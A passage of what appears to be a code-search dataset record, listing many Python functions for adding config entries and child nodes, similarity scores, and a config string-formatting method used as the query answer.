override_config(cfg, redirect=self.props.redirect)\n\n cfg.save_config()\n return cfg", "def add_config(self, conf_map):\n if self.active.isChecked():\n self.add_feat_conf(conf_map)", "def AddConfigVar(name, doc, configparam, root=config, in_c_key=True):\r\n\r\n # This method also performs some of the work of initializing ConfigParam\r\n # instances\r\n\r\n if root is config:\r\n #only set the name in the first call, not the recursive ones\r\n configparam.fullname = name\r\n sections = name.split('.')\r\n if len(sections) > 1:\r\n # set up a subobject\r\n if not hasattr(root, sections[0]):\r\n # every internal node in the config tree is an instance of its own\r\n # unique class\r\n class SubObj(object):\r\n _i_am_a_config_class = True\r\n setattr(root.__class__, sections[0], SubObj())\r\n newroot = getattr(root, sections[0])\r\n if (not getattr(newroot, '_i_am_a_config_class', False)\r\n or isinstance(newroot, type)):\r\n raise TypeError(\r\n 'Internal config nodes must be config class instances',\r\n newroot)\r\n return AddConfigVar('.'.join(sections[1:]), doc, configparam,\r\n root=newroot, in_c_key=in_c_key)\r\n else:\r\n if hasattr(root, name):\r\n raise AttributeError('This name is already taken',\r\n configparam.fullname)\r\n configparam.doc = doc\r\n configparam.in_c_key = in_c_key\r\n # Trigger a read of the value from config files and env vars\r\n # This allow to filter wrong value from the user.\r\n if not callable(configparam.default):\r\n configparam.__get__()\r\n else:\r\n # We do not want to evaluate now the default value when it is a callable.\r\n try:\r\n fetch_val_for_key(configparam.fullname)\r\n # The user provided a value, filter it now.\r\n configparam.__get__()\r\n except KeyError:\r\n pass\r\n setattr(root.__class__, sections[0], configparam)\r\n _config_var_list.append(configparam)", "def fm_append_member(cls, parent, child):\n parent.fm_append(child, cls.CHILD)\n child.fm_append(parent, cls.PARENT)", "def add_child(self, child):\n name = name_displayer.display(child)\n birth = get_birth_or_fallback(self.dbstate.db, child)\n birth_date, birth_sort, birth_place = self.get_date_place(birth)\n death = get_death_or_fallback(self.dbstate.db, child)\n death_date, death_sort, death_place = self.get_date_place(death)\n self.model.add((child.get_handle(),\n name,\n birth_date,\n birth_sort,\n death_date,\n death_sort))", "def inherit(self, parent):\n return self.__class__(Cfg._mergedicts(self, parent, False))", "def add_config_item(self, config, value, path):\n if len(path) == 1:\n config[path[0]] = value\n return\n if path[0] not in config:\n config[path[0]] = dict()\n elif isinstance(config[path[0]], str):\n config[path[0]] = dict() if config[path[0]] == u\"\" \\\n else {config[path[0]]: u\"\"}\n self.add_config_item(config[path[0]], value, path[1:])", "def add_child(self, child_account):\r\n self._children.append(child_account)", "def append_child(self, child):\n \n # Check a type of 'child' parametr\n if not isinstance(self, SitemapTreeElement):\n raise TypeError('SiteMapTreeElement type expected')\n self._children.append(child)", "def add_subcommands(self, name='subcmd', arg_kws=None, optional=False):\n if self._subcmds is not None:\n raise RuntimeError(\"This config already has subcommands.\")\n if name in self.ReservedVariables or name[0] == '_':\n raise ValueError(\"Config variable name '%s' is reserved.\" % name)\n if name in self.confvariable:\n raise ValueError(\"Config variable '%s' is already defined.\" % name)\n if arg_kws is None:\n arg_kws = dict(title=\"subcommands\")\n else:\n arg_kws = dict(arg_kws)\n arg_kws['dest'] = name\n subparsers = self.argparser.add_subparsers(**arg_kws)\n var = ConfigSubCmds(name, optional, self, subparsers)\n self.confvariable[name] = var\n self.confvariables.append(var)\n self._subcmds = var\n return var", "def add_config(self, config):\n\n if config.identifier in self.configs:\n raise DuplicateConfigException(\n \"Builder already has config with identifier : {}\".format(\n config.identifier\n )\n )\n\n self.configs[config.identifier] = config", "def append_conf(self, chart_id, producer, renderer):\n self.confs[chart_id] = {\"producer\": producer, \"renderer\": renderer}", "def add_easyconfig(self, cfg, name, version, stats, append):\n dest = FileRepository.add_easyconfig(self, cfg, name, version, stats, append)\n # add it to version control\n if dest:\n try:\n self.client.add(dest)\n except GitCommandError, err:\n self.log.warning(\"adding %s to git failed: %s\" % (dest, err))", "def add_child(self, cd, wt: float):\n self.child.append([cd, wt])", "def config(*subconfig):\n\n with open('configure.yaml', 'r') as stream:\n args = yaml.load(stream)\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(description='')\n parser.add_argument(\n '--node',\n '-n',\n help='The node ID.'\n )\n parser.add_argument(\n '--processes',\n '-p',\n help='The total number of processes.'\n )\n # Store command line arguments in a dict\n cl_args = parser.parse_args()\n cl_args_dict = vars(cl_args)\n # Combine\n args.update(cl_args_dict)\n # Find subconfig if argument is passed\n for s in subconfig:\n try:\n args = args[s]\n except:\n pass\n # Return\n return args", "def __init__(self, configpath):\n super().__init__('master process')\n self._configpath = configpath\n self._children = []", "def set_child(self, child):\n if child.tags is None:\n raise Exception(\"Missing tags when: Component {0} tried ta add_child \"\n \"component: {1} to its children. \".format(str(self), str(child)))\n if child.component_type is None:\n raise Exception(\"Missing component_type when: Component {0} tried ta add_child \"\n \"component: {1} to its children. \".format(str(self), str(child)))\n if not child._parent is None:\n raise Exception(\"Component {0} tried ta add_child \"\n \"component: {1} to its children. \"\n \"But it already \"\n \"had parent: {2}.\".format(str(self), str(child), str(child.parent)))\n if self.has(child.component_type):\n self.remove_component_of_type(child.component_type)\n self._children[child.component_type] = child\n self._add_child_to_tag_table(child)\n child.parent = self", "def add(ctx, project_root, name, level, formatter, log_path):\n with ensure_conf_exist(project_root) as logme_conf:\n\n validate_conf(name, logme_conf)\n\n conf_content = get_tpl(name, level=level, formatter=formatter, filename=log_path)\n config = get_config(conf_content)\n\n # check if section already exist\n with logme_conf.open('a') as conf:\n config.write(conf)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n #Before creating config file _id must be id, and _type must be type\n if attr == \"_id\" or attr == \"_type\" : attr = attr.split(\"_\")[-1]\n #There isnt any underscore in config options, replace them with dashes if found any\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def AddConfigVar(name, doc, configparam, root=config):\n\n # This method also performs some of the work of initializing ConfigParam\n # instances\n\n if root is config:\n # only set the name in the first call, not the recursive ones\n configparam.fullname = name\n sections = name.split('.')\n if len(sections) > 1:\n # set up a subobject\n if not hasattr(root, sections[0]):\n # every internal node in the config tree is an instance of its own\n # unique class\n class SubObj(object):\n _i_am_a_config_class = True\n setattr(root.__class__, sections[0], SubObj())\n newroot = getattr(root, sections[0])\n if (not getattr(newroot, '_i_am_a_config_class', False) or\n isinstance(newroot, type)):\n raise TypeError(\n 'Internal config nodes must be config class instances',\n newroot)\n return AddConfigVar('.'.join(sections[1:]), doc, configparam,\n root=newroot)\n else:\n if hasattr(root, name):\n raise AttributeError('This name is already taken',\n configparam.fullname)\n configparam.doc = doc\n # Trigger a read of the value from config files and env vars\n # This allow to filter wrong value from the user.\n if not callable(configparam.default):\n configparam.__get__(root, type(root), delete_key=True)\n else:\n # We do not want to evaluate now the default value\n # when it is a callable.\n try:\n fetch_val_for_key(configparam.fullname)\n # The user provided a value, filter it now.\n configparam.__get__(root, type(root), delete_key=True)\n except KeyError:\n pass\n setattr(root.__class__, sections[0], configparam)\n _config_var_list.append(configparam)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def _add_child(self, node):\n self.children.update({\n node.name: node\n })\n node.path = self._sep.join([self.path, node.name])\n node.parent = self", "def config(self, **kwargs):\n\n # our options that we deal with\n entry = options[\"entry\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in entry:\n v = kwargs.pop(k)\n self.entry.config(**{entry[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)", "def add_spoof_child(self, child):\n if child.tags is None:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But tags \"\n \"was not set.\".format(str(self), str(child)))\n if child.component_type is None:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But component_type \"\n \"was not set.\".format(str(self), str(child)))\n if not child._parent is None and child.parent != self:\n raise Exception(\"Component {0} tried to add_child \"\n \"component: {1} to its children. \"\n \"But it already \"\n \"had parent: {2}.\".format(str(self), str(child), str(child.parent)))\n if not child.component_type in self._spoofed_children:\n self._spoofed_children[child.component_type] = []\n self._spoofed_children[child.component_type].append(child)\n self._add_child_to_tag_table(child)\n child.parent = self", "def add_child(self, child):\n\n self._children.add(child)", "def add_configuration(self, params):\n config_index = len(self.configurations)+1\n # '-g' is a mandatory argument of CaVEMan (Location of tsv ignore regions file)\n # Other programs do not require (or even support) this type of file\n # Therefore, this benchmark framework makes this file an optional input\n # (an empty file is given if not specified)\n if 'setup:-g' not in params.keys():\n logging.info(\"CaVEMan: config_{0} adding setup:-g=/dev/null in params\".format(config_index))\n params['setup:-g'] = '/dev/null'\n self.configurations.append(SinglePairedConfiguration(params, config_index))", "def add(self, child):\r\n# child = Node()\r\n# child._id = Kinetic.Global.id_counter\r\n# Kinetic.Global.id_counter += 1\r\n child.index = len(self.children)\r\n child.parent = self\r\n self.children.append(child)\r\n stage = child.get_stage()\r\n\r\n if not stage:\r\n Kinetic.Global._add_temp_node(child)\r\n else:\r\n stage._add_id(child)\r\n stage._add_name(child)\r\n\r\n go = Kinetic.Global\r\n go._pull_nodes(stage)\r\n\r\n if hasattr(self, '_add'):\r\n self._add(child)\r\n\r\n return '%s.add(%s);' %(self.name, child.name)", "def add_config(self, config):\n clean=lambda n: n.strip().strip('\"').lower()\n for line in config.split('\\n'):\n items=line.strip().split()\n if items and len(items) >= 3:\n cmd, evt, hnd=items[:3]\n \"\"\" NOTE\n - just 'bind' command expected right now\n - '+' prepended ti the handler means REPEAT (make sense just for keyboard keys actually)\n \"\"\"\n cmd=clean(cmd)\n if cmd in ['bind']:\n evt,hnd=(clean(evt), clean(hnd))\n if not cmd in self.config: self.config[cmd]={}\n repeat=hnd.startswith('+')\n if repeat: hnd=hnd[1:]\n self.config[cmd].update([[evt, [hnd, repeat]]])", "def set_config(self, cfg):\n\n cfg.add_section(self.name)\n for attr, value in self.__dict__.items():\n if value not in [\"false\", \"none\", \"0\"] and attr != \"name\":\n attr = attr.replace(\"_\", \"-\")\n cfg.set(self.name, attr, value)", "def add_child(self, child):\n\t\t\n\t\tif child.__class__ != FileObject:\n\t\t\traise InvalidParameterError('child', 'should be an instance of FileObject')\n\t\t\n\t\tself.__childs.append(child)\n\t\treturn True", "def add_child(self, child):\n \n if not (isinstance(child, CompoundCamera) or \\\n isinstance(child, sensors.SensorElement)):\n raise TypeError('`child` must be type: SensorElement or '\n 'CompoundCamera')\n \n for c in self.children:\n if c.name == child.name:\n if c is child:\n raise NameError('Child object already registered with parent!')\n else:\n raise NameError('Child with name %s already registered with'\n ' this parent (%s) -- please change the ID'\n ' number to give this object a unique name '\n 'and re-register it as a child object' % \\\n (child.name, self.name))\n \n self.children.append(child)\n child._parent = self\n \n return", "def add_child(self, parent, child):\n wanted_parent = self.__find(parent, self.root)\n\n # check if there isn't a child with that value already\n child_exists = self.__find(child, self.root)\n if child_exists:\n raise Exception('A child with value {} already exists!'.format(child))\n\n wanted_parent.add_child(Node(child, parent=wanted_parent))\n self.nodes += 1", "def configfile(self, fp):\n if not self.modifier.skip_configfile:\n if os.path.exists(fp):\n self.configfiles.append(fp)\n c = snakemake.io.load_configfile(fp)\n update_config(self.config, c)\n if self.overwrite_config:\n logger.info(\n \"Config file {} is extended by additional config specified via the command line.\".format(\n fp\n )\n )\n update_config(self.config, self.overwrite_config)\n elif not self.overwrite_configfiles:\n fp_full = os.path.abspath(fp)\n raise WorkflowError(\n f\"Workflow defines configfile {fp} but it is not present or accessible (full checked path: {fp_full}).\"\n )\n else:\n # CLI configfiles have been specified, do not throw an error but update with their values\n update_config(self.config, self.overwrite_config)", "def post_config_root_create(self, resource_dict):\n pass", "def configure(self, conf):\n\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))", "def add_config(self, key, type_, default=NOT_SET, env_var=None):\n self.config[key] = {'type': type_}\n if env_var is not None:\n self.config[key]['env_var'] = env_var\n if default is not NOT_SET:\n self.config[key]['default'] = default", "def add_config(self):\n\n config = {\n 'count_up': CountUp,\n 'count_down': CountDown,\n 'count_up_or_down': CountUpOrDown,\n 'high_speed_counter_definition': HighSpeedCounterDefinition,\n 'high_speed_counter': HighSpeedCounter,\n 'pulse_output': PulseOutput\n }\n\n return config", "def add_config(self):\n\n config = {\n 'byte_to_integer': ByteToInteger,\n 'integer_to_byte': IntegerToByte,\n 'integer_to_double_integer': IntegerToDoubleInteger,\n 'integer_to_string': IntegerToString,\n 'double_integer_to_integer': DoubleIntegerToInteger,\n 'double_integer_to_real': DoubleIntegerToReal,\n 'double_integer_to_string': DoubleIntegerToString,\n 'binary_coded_decimal_to_integer': BinaryCodedDecimalToInteger,\n 'integer_to_binary_coded_decimal': IntegerToBinaryCodedDecimal,\n 'round': Round,\n 'truncate': Truncate,\n 'real_to_string': RealToString,\n 'integer_to_ascii': IntegerToASCII,\n 'double_integer_to_ascii': DoubleIntegerToASCII,\n 'real_to_ascii': RealToASCII,\n 'ascii_to_hexadecimal': ASCIIToHexadecimal,\n 'hexadecimal_to_ascii': HexadecimalToASCII,\n 'string_to_integer': StringToInteger,\n 'string_to_double_integer': StringToDoubleInteger,\n 'string_to_real': StringToReal,\n 'decode': Decode,\n 'encode': Encode,\n 'segment': Segment\n }\n\n return config", "def add_child(self, child_node):\n # Assignment group doesn't have short_name\n if not hasattr(child_node.node, 'short_name'):\n # Makes sure the candidates are shown if a student \n # is part of more than one AssignmentGroup\n if len(self.children) != 0:\n child_node.display_group = True\n # Contains only one, set display_group to True for that element as well.\n if len(self.children) == 1:\n list(self.children.values())[0].display_group = True\n self.children[child_node] = child_node\n else:\n if child_node.get_name() not in self.children:\n self.children[child_node.get_name()] = child_node\n else:\n self.children[child_node.get_name()].merge(child_node)", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def config(self):\n raise NotImplementedError", "def setProperty(self, child, key, value):\n\n # First get the child's dictionary\n childDict = self.getInfoDict(child)\n if childDict:\n childDict[key] = value", "def extend(clself, other):\n clself._cfg_def.extend(other._cfg_def)\n for key, optdef in clself._cfg_def.options.iteritems():\n setattr(clself, key, optdef)", "def addChildObject(self, child):\n \n currChild = self.getChild(child.getName())\n if currChild:\n index = self.getIndex(currChild)\n if index != -1:\n self._children[index] = child\n child.setParent(self)\n # Unset the existing child's parent\n currChild.setParent(None)\n del currChild\n \n self.__setChildDict(child)\n else:\n child.setParent(self) \n self._children.append(child)\n self.__setChildDict(child)", "def _setup_parents(self, parents=None):\n from trac import config\n self.parents = (parents or [])\n for filename in self.get('inherit', 'file').split(','):\n filename = Section._normalize_path(filename.strip(), self.env)\n self.parents.append(config.Configuration(filename))", "def __setChildDict(self, child):\n \n d = self[self._name]\n d[child.getName()] = child.getDict()", "def appendChild(self, child):\n self.points += child.points.copy()\n self.children.append(child)", "def add_child(self, child):\n assert isinstance(child, (Node, str))\n self.children.append(child)\n return child", "def update_config(self, update_dict):\n self.config = recursive_merge_dicts(self.config, update_dict)", "def add_child(self, child: object, add_parent=True) -> bool:\n if child not in self._children:\n self._children.append(child)\n\n if add_parent:\n child.add_parent(self, add_child=False)\n\n return True\n\n return False", "def create_config(self) -> None:\n pass", "def create_config(self) -> None:\n pass", "def add_extra(self, entry, value):\n\n config_spec = vim.vm.ConfigSpec()\n self.logger.info(\"Adding/Updating extra config: {0} = {1}\".format(entry, value))\n opt = vim.option.OptionValue()\n opt.key = entry\n opt.value = value\n config_spec.extraConfig = [opt]\n return self.vm_obj.ReconfigVM_Task(spec=config_spec)", "def configure(self, section):", "def add_parent_attributes(self):\n if len(self.parent_attributes) == 0:\n return\n dest = self.parent.attributes\n source = self.parent_attributes\n changes = {}\n self.merge_attribute_defs(dest, source, changes)\n for aid, value in changes.iteritems():\n# self.parent.h5node.attrs[aid] = value\n # may need modifying for MATLAB\n #- if self.path not in self.file.file_pointer:\n if self.file.get_node(self.path, abort=False) is None:\n # create parent node since it does not exist\n print \"trying to set parent attributes on non-registered parent node:\"\n print \"Non-registered parent node is: '%s'\", self.path\n traceback.print_stack()\n sys.exit(1)\n #- self.file.file_pointer[self.path].attrs[aid] = value\n self.file.set_attribute(self.path, aid, value)", "def merge(self, newer_config, **kwargs):\n kwargs['merge'] = True\n logger.debug('from parent merge: %s', kwargs)\n return self.update(newer_config, **kwargs)", "def add_child(self, child, **kwargs):\n if child.is_root:\n return\n if 'after' in kwargs:\n if kwargs['after'] is not None:\n try:\n self.children.insert(\n self.children.index(kwargs['after']), child)\n return\n except ValueError:\n self.children.append(child)\n else:\n self.children.insert(0, child)\n self.children.append(child)\n if child.parent is not self and child.parent is not None:\n child.parent.remove_child(child)\n # pylint: disable=protected-access\n child.__parent = self", "def configure(new_config: Mapping):\n config.update(new_config)", "def add_child(self, child):\n super(ImageInput, self).add_child(child)\n\n # If this is a relative URL, it's relative to the statics directory\n # of the application\n src = self.get('src')\n if src is not None:\n self.set('src', absolute_url(src, self.renderer.head.static_url))", "def add_child(self, child):\n\n child_parent_scope = child.parent_scope\n child_parent_value = child.parent_value\n\n if all([\n child_parent_scope == self.scope,\n child_parent_value == self.value,\n self.user in (child.user, ANY),\n ]):\n self.children.append(child)\n child.parent = self\n return True\n\n else:\n return any([node.add_child(child) for node in self.children])", "def config_changed(self, update_parent=True):\n super(Assembly, self).config_changed(update_parent)\n # driver must tell workflow that config has changed because\n # dependencies may have changed\n if self.driver is not None:\n self.driver.config_changed(update_parent=False)\n \n # Detect and save any loops in the graph.\n if hasattr(self, '_depgraph'):\n graph = self._depgraph._graph\n self._graph_loops = nx.strongly_connected_components(graph)", "def patch_config(self_config, indict):\n for key in self_config:\n if isinstance(self_config[key], Section) \\\n and key in indict and isinstance(indict[key], Section):\n self_config[key].parent = self_config\n self_config[key].main = self_config.main\n self_config.comments[key] = indict.comments[key]\n self_config.inline_comments[key] = indict.inline_comments[key]\n patch_config(self_config[key], indict[key])", "def add_parent(self, child, parent):\r\n setp = self._parents.setdefault(child, set())\r\n setp.add(parent)", "def _add_child_addresses(children_dicts):\n child_addresses = list(children_dicts.keys())\n cambrionix_address = [\n key for key, value in children_dicts.items()\n if value.product_name in usb_config.CAMBRIONIX_NAMES\n ][0]\n children_dicts[cambrionix_address].child_addresses = child_addresses\n for address in child_addresses:\n if address != cambrionix_address:\n children_dicts[address].usb_hub_address = cambrionix_address", "def update_config(self, config):\n # add follower public folder to the CKAN's list of public folders\n here = os.path.dirname(__file__)\n public_dir = os.path.join(here, 'public')\n if config.get('extra_public_paths'):\n config['extra_public_paths'] += ',' + public_dir\n else:\n config['extra_public_paths'] = public_dir\n # add follower template folder to the CKAN's list of template folders\n template_dir = os.path.join(here, 'templates')\n if config.get('extra_template_paths'):\n config['extra_template_paths'] += ',' + template_dir\n else:\n config['extra_template_paths'] = template_dir", "def _add_input(config, input_file, folder, scale_factor, weight, nick, nick_suffix=\"\", proxy_prefix=\"\"):\n\t\tconfig.setdefault(\"files\", []).append(input_file)\n\t\tconfig.setdefault(\"folders\", []).append(folder)\n\t\tconfig.setdefault(\"scale_factors\", []).append(scale_factor)\n\t\tconfig.setdefault(\"weights\", []).append(weight)\n\t\tconfig.setdefault(\"nicks\", []).append(nick+nick_suffix)\n\t\tconfig.setdefault(\"tree_draw_options\", []).append(\"proxy\" if len(proxy_prefix)>0 else \"\")\n\t\tconfig.setdefault(\"proxy_prefixes\", []).append(proxy_prefix)\n\t\t\n\t\treturn config", "def add_edge(self, parent, child):\r\n log.debug('add_edge({}, {})'.format(parent, child))\r\n if parent is not None:\r\n self._parents_of[child].add(parent)\r\n if child is not None:\r\n self._children_of[parent].add(child)", "def create_child(self):\n raise NotImplementedError" ]
[ "0.7265803", "0.6487871", "0.64664084", "0.62878114", "0.6264923", "0.6200054", "0.6032241", "0.59954774", "0.5990614", "0.59605205", "0.59455884", "0.59455884", "0.591581", "0.5893812", "0.5794489", "0.5790334", "0.57764447", "0.5702759", "0.56942874", "0.5688074", "0.56839925", "0.5677099", "0.56742185", "0.56387055", "0.56370103", "0.5616215", "0.5584076", "0.5555786", "0.554189", "0.5536735", "0.5528112", "0.5509025", "0.5483496", "0.5471256", "0.54701936", "0.5463738", "0.5460892", "0.5443621", "0.5435751", "0.54353863", "0.5430739", "0.5427337", "0.5426231", "0.5415624", "0.5411567", "0.5403052", "0.53992754", "0.5398497", "0.53968453", "0.5392047", "0.5378419", "0.5378419", "0.5378419", "0.5372865", "0.5371897", "0.53710186", "0.53705454", "0.536289", "0.53594065", "0.5357862", "0.53525734", "0.535149", "0.5349208", "0.53468907", "0.53453785", "0.5345103", "0.5327837", "0.5322222", "0.52984434", "0.52904236", "0.5269987", "0.5266196", "0.5259898", "0.5251966", "0.52503175", "0.52322435", "0.52259135", "0.52132106", "0.52124983", "0.5198372", "0.5181877", "0.51812893", "0.5177163", "0.5177163", "0.5177042", "0.5170631", "0.51674354", "0.51644677", "0.51641786", "0.51628", "0.51595175", "0.5153809", "0.5147145", "0.51467305", "0.51292574", "0.51279813", "0.512643", "0.51113874", "0.5101407", "0.5100179" ]
0.7865205
0
Format strings using CONFIG object. This method uses python's builtin `str.format()` method. All root properties in CONFIG are passed in as kwargs. The properties lazy evaluate and recursively expand.
def format(self, value, key=None, **kwargs): if not isinstance(value, str): return value # always format strings using the root so the full path is available if self.root: return self.root.format(value, key, **kwargs) variables = CONFIG_VARIABLE_PATTERN.findall(value) expanded = {} for variable in variables: if variable not in kwargs: try: root_key = variable.split(".")[0] root = self.root if self.root else self expanded[root_key] = self.format(getattr(root, root_key), variable, **kwargs) except AttributeError: raise MissingConfiguration(variable, key) expanded.update(**kwargs) return value.format(**expanded)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def recursively_update_config(config, string_formatting_dict):\n\n for k in _iterate_list_or_dict(config):\n v = config[k]\n if isinstance(v, dict) or isinstance(v, list):\n recursively_update_config(v, string_formatting_dict)\n else:\n if _key_in_string(v, string_formatting_dict):\n config[k] = v.format(**string_formatting_dict)", "def set_formatter_string(config: dict):\n formatter_str = \"%(levelname)s %(name)s\"\n\n if config.get(\"formatter\"):\n return config[\"formatter\"]\n\n if config.get(\"extended\"):\n formatter_str += \".%(funcName)s():\"\n\n if config.get(\"timestamp\"):\n formatter_str = \"%(asctime)s \" + formatter_str\n\n formatter_str += \" %(message)s\"\n\n return formatter_str", "def format_string(self, template):\n out_str = \"\"\n search_property_name = \"\"\n in_property = False\n for char in template:\n if (in_property):\n if (char == '%'):\n if (len(search_property_name) > 0):\n prop_value = \"\"\n try:\n prop_value = str(self.get_property(search_property_name))\n except KeyError:\n pass\n out_str += prop_value\n search_property_name = \"\"\n in_property = False\n else:\n search_property_name += char\n else:\n if (char == '%'):\n in_property = True\n else:\n out_str += char\n\n # Handle unterminated property names\n if (in_property):\n out_str += '%'\n out_str += search_property_name\n\n return out_str", "def cfg_to_prop_string(cfg, key_transform=lambda k: k, value_transform=lambda v: v, separator=\";\"):\n return separator.join([\"%s:%s\" % (key_transform(key), value_transform(value)) for key, value in iteritems(cfg)])", "def format(self, **kw):\n params = self.defaults.copy()\n params.update(kw)\n if self.filter:\n self.filter(self, params)\n msg = self.msg\n if self.key is not None:\n key = self.key.format(**params)\n msg = msg[key]\n return msg.format(**params)", "def format(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append('{}={}'.format(k, v))\n print ', '.join(sub_items)", "def dump_config(self, obj, level=-1):\n indent = u\" \"\n if level >= 0:\n self._nginx_config += f\"{level * indent}{{\\n\"\n if isinstance(obj, dict):\n for key, val in obj.items():\n if hasattr(val, u\"__iter__\") and not isinstance(val, str):\n self._nginx_config += f\"{(level + 1) * indent}{key}\\n\"\n self.dump_config(val, level + 1)\n else:\n self._nginx_config += f\"{(level + 1) * indent}\" \\\n f\"{key} {val};\\n\"\n else:\n for val in obj:\n self._nginx_config += f\"{(level + 1) * indent}{val};\\n\"\n if level >= 0:\n self._nginx_config += f\"{level * indent}}}\\n\"", "def __str__(self):\n return self.fmt.format(*self.args, **self.kwargs)", "def format_string(self, pat=None, pat_args={}):\n if pat is None:\n pat = self.parent.pat\n if pat_args == {}:\n pat_args = self.parent.pat_args\n return entry_format.output(self, pat, pat_args)", "def GetConfigAsString(self, config, enum_values, index):\n string = textwrap.dedent(\"\"\"\\\n [{index}] = {{\n .monitor = {monitor_name},\n .stack_level = 0x{address:02X},\n .input_mask = 0x{input_mask:03X},\n .v_balance_min = {balance_min_cutoff}f,\n .v_balance_thres = {balance_thres}f,\n .v_balance_hyst = {balance_hysteresis}f,\n .num_max_simult_bal = {max_simult_balance}L,\n .num_series_cells = {num_series_cells}L,\n .control = {{\n .under_volt_thres = {under_volt_thres}f,\n .over_volt_thres = {over_volt_thres}f,\n .reference_on = {reference_on},\n .discharge_permitted = {discharge_permitted},\n .rate = {rate_str},\n .cell_channels = {cell_ch_str},\n .aux_channels = {aux_ch_str},\n .stat_channels = {stat_ch_str},\n .discharge_timeout = {dcto_str},\n .self_test_mode = {self_test_str}}}}},\n \"\"\").format(\n index=index,\n monitor_name=enum_values['monitor'],\n rate_str=rate_helper.Name(config['rate']),\n cell_ch_str=cell_ch_helper.Name(config['cell_ch']),\n aux_ch_str=aux_ch_helper.Name(config['aux_ch']),\n stat_ch_str=stat_ch_helper.Name(config['stat_ch']),\n dcto_str=dcto_helper.Name(config['discharge_timeout']),\n self_test_str=self_test_helper.Name(config['self_test_mode']),\n **config)\n return string", "def format_yaml(template, config):\n formatted = template\n for k, v in config.items():\n formatted = formatted.replace('${%s}' % k, v)\n return formatted", "def _process_str(self, fmt, *args, **kwargs):\n log_str = fmt\n if len(args) > 0 or len(kwargs) > 0:\n log_str = fmt.format(*args, **kwargs)\n\n return log_str", "def print_formatted_values(**kwargs):\n string = ', '.join([f'{k}: {format_number(kwargs[k])}' for k in kwargs])\n print(string)", "def digest_config(obj, kwargs, local_args = {}):\n ### Assemble list of CONFIGs from all super classes\n classes_in_heirarchy = [obj.__class__]\n configs = []\n while len(classes_in_heirarchy) > 0:\n Class = classes_in_heirarchy.pop()\n classes_in_heirarchy += Class.__bases__\n if hasattr(Class, \"CONFIG\"):\n configs.append(Class.CONFIG) \n\n #Order matters a lot here, first dicts have higher priority\n all_dicts = [kwargs, filtered_locals(local_args), obj.__dict__]\n all_dicts += configs\n item_lists = reversed([d.items() for d in all_dicts])\n obj.__dict__ = dict(reduce(op.add, item_lists))", "def __str__(self):\n config_str = 'Configurations\\n'\n config_str += pprint.pformat(self.__dict__)\n return config_str", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def format(self, *args, **kwargs) -> String:\n pass", "def format(self, *args, **kwargs):\n return self._format(args, kwargs)", "def format_string(self, pat=None, pat_args=None):\n if pat is None:\n pat = self.pat\n if pat_args is None:\n pat_args = self.pat_args\n return '\\n'.join(e.format_string(pat, pat_args) for e in self)", "def _format_bases_config(bases_config: BasesConfiguration) -> str:\n return \"_\".join([_format_run_on_base(r) for r in bases_config.run_on])", "def get_formatter(self, **kwargs):\n config = dict([\n (attr, getattr(self, attr))\n for attr in [\n \"include_sign\",\n \"group_with_commas\",\n \"num_decimal_places\",\n ]\n ])\n config.update(kwargs)\n return \"\".join([\n \"{\",\n config.get(\"field_name\", \"\"),\n \":\",\n \"+\" if config[\"include_sign\"] else \"\",\n \",\" if config[\"group_with_commas\"] else \"\",\n \".\", str(config[\"num_decimal_places\"]), \"f\",\n \"}\",\n ])", "def print_config(config, logger):\n for k, v in config.items():\n logger.info(\"{}:\\t{}\".format(k.ljust(15), v))", "def format(self, obj, indent=0):\r\n return pformat(obj, indent=indent, depth=self.depth)", "def format(self):\n groups = [g + \".\" for g in self.groups]\n params = [\";\" + p.format() for p in self.params]\n groups_name_params = \"\".join(groups) + self.name + \"\".join(params)\n return groups_name_params + \":\" + self.format_value() + CRLF", "def log_cfg(cfg: dict, logger: Logger, prefix: str = \"cfg\"):\n for k, v in cfg.items():\n if isinstance(v, dict):\n p = \".\".join([prefix, k])\n log_cfg(v, logger, prefix=p)\n else:\n p = \".\".join([prefix, k])\n logger.info(\"{:34s} : {}\".format(p, v))", "def get_config_string(params, units=None):\n compact_str_items = []\n # first make a list of compact strings for each parameter\n for k, v in params.items():\n unit = \"\"\n if isinstance(units, dict): #check if not None not enough, units could be mocked which causes errors\n unit = units.get(k, \"\")\n compact_str_items.append(k + \"=\" + str(v) + unit)\n # and finally join them\n compact_str = \", \".join(compact_str_items)\n return compact_str", "def context_formatter(\n full_context: dict,\n *,\n flask_context: dict,\n schema_context: dict,\n model_context: dict,\n):\n sections = [(\"Flask\", flask_context)]\n if schema_context: # pragma: 